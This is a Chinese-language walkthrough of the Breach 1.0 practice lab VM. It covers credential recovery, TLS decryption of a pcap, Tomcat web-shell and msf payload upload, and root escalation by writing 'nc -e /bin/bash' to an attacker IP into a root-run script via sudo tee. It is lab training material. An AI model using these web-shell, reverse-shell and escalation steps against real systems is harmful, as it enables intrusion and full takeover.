1.nmap扫描ip靶机端口

breach1.0靶场breach1.0靶场
2.进入首页http://192.168.110.140/
breach1.0靶场
3.查看页面源代码 发现
breach1.0靶场

两次base64解密<!------pgibbons:damnitfeelgoodtobeaganggoodtobeagangta ----->
这个可能是某个地方的账号密码 (先记下来)
4.点击主页图片 再进入
breach1.0靶场
5.发现一个登陆界面 用刚才的密码登录
breach1.0靶场
6.点击各个功能点 发现邮件里有一个keystore的文件,点击下载
breach1.0靶场
7.继续浏览功能点发现一个按钮,点击此链接
breach1.0靶场
8.发现一个pcap流量包,点击下载 同时观察页面发现重要信息密码都是tomcat
breach1.0靶场
9.把第一个下载的文件kerstore放到根目录,进入java/jre
将keystore放到C盘根目录,查看keystore这个**库里面的所有证书
keytool -list -keystore c:\keystore 输入**库口令tomcat:

从**库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:
keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat

breach1.0靶场breach1.0靶场breach1.0靶场
10.将导出的证书导入wireshare

导入流量包
breach1.0靶场
breach1.0靶场

在流量包里找到后台地址
breach1.0靶场
账号密码流量包
breach1.0靶场
11.访问后台,解密后得tomcat:Tt\5D8F(#!*u=G)4m7zB
由于该地址的证书不安全,所以需要开启burpsuite,经过代理可以添加安全例外
breach1.0靶场

传完马的位置 192.168.110.140:8443/压缩包的名字/木马名字.jsp
breach1.0靶场
发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。
11.制作msf5马
breach1.0靶场
配置msf5准备监听

breach1.0靶场

将木马上传到服务器,访问木马,反弹到shell

breach1.0靶场

反弹终端
breach1.0靶场breach1.0靶场

收集主机信息
breach1.0靶场
查看用户的密码,发现两个用户
breach1.0靶场

进入数据库,好像不用密码

breach1.0靶场

查看数据库中的内容
breach1.0靶场

得到密码:thelaststraw
登陆用户milton
breach1.0靶场
breach1.0靶场
但是有个图片文件,联想到blumbergh用户下应该也有图片
进不去,但是在前面的时候有个gif的图片

breach1.0靶场

将下载好的图片打包breach1.0靶场

打印图片中的可打印字符,追加输出到image.txt

breach1.0靶场

提权成功

breach1.0靶场

查看历史命令
breach1.0靶场

查看用户权限
breach1.0靶场
查看权限发现/usr/share/cleanup/tidyup.sh只有root可写
breach1.0靶场
可以用root权限运行tee命令
breach1.0靶场
那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令
echo “nc -e /bin/bash 192.168.110.128 8989” > shell.txt
用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是够写入成功
cat /usr/share/cleanup/tidyup.sh

开启监听
breach1.0靶场
成功 用id命令查看权限
用命令python -c 'import pty;pty.spawn("/bin/bash")'得到交互页面
breach1.0靶场
将图片挪到home目录下
breach1.0靶场
上传大马
breach1.0靶场

拿到flag
breach1.0靶场

相关文章: